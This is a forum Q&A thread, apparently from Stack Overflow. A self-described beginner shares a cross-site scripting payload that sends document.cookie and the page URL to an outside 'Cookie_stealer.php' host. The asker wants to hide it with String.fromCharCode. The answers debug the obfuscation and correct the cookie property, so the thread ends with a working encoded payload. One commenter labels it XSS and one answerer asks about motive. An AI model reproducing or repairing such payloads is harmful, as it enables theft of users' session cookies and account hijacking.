# Javascript string.fromcharcode

Tags: javascript, string

i am new to javascript and programming at all.

This is orginal code:

```
document.location = "http://ormteam.net23.net/Cookie_stealer.php?url=" + window.location.href + "&cookies=" + document.cookie;
```

And this is with string.fromcharcode

```
document.location = String.fromCharCode(34, 104, 116, 116, 112, 58, 47, 47, 111, 114, 109, 116, 101, 97, 109, 46, 110, 101, 116, 50, 51, 46, 110, 101, 116, 47, 67, 111, 111, 107, 105, 101, 95, 115, 116, 101, 97, 108, 101, 114, 46, 112, 104, 112, 63, 117, 114, 108, 61, 34) + document.url + String.fromCharCode(34, 38, 99, 111, 111, 107, 105, 101, 115, 61, 34) + document.cookies;
```

Why this does not work ?

Sitting on this peace of code for hours! ;//

Answer (score 4):

The quotes are only needed for the string literal. Since you're not using a string literal, you don't need the quotes.

```
document.location = String.fromCharCode(104, 116, 116, 112, ...
```

Comment: can going to such a link from SO lead to stealing my cookie and causing any security issues? :)

Comment: @sabithpocker No more than going to a link with the string literal directly can.

Comment: @pickypg just curious as it passed `document.cookie` as `GET` parameter when i tried it in console.

Comment: @sabithpocker That's because the `location` specifies it at the end. That is by-the-book cross site scripting (XSS), but it's no different than if the link was encoded as it was originally (a string).

Answer (score 2):

remove `34` from those char codes as they are for `"`

make `document.cookies` to `document.cookie`

What are you doing with cookie stealer if you are new to javascript, just curious!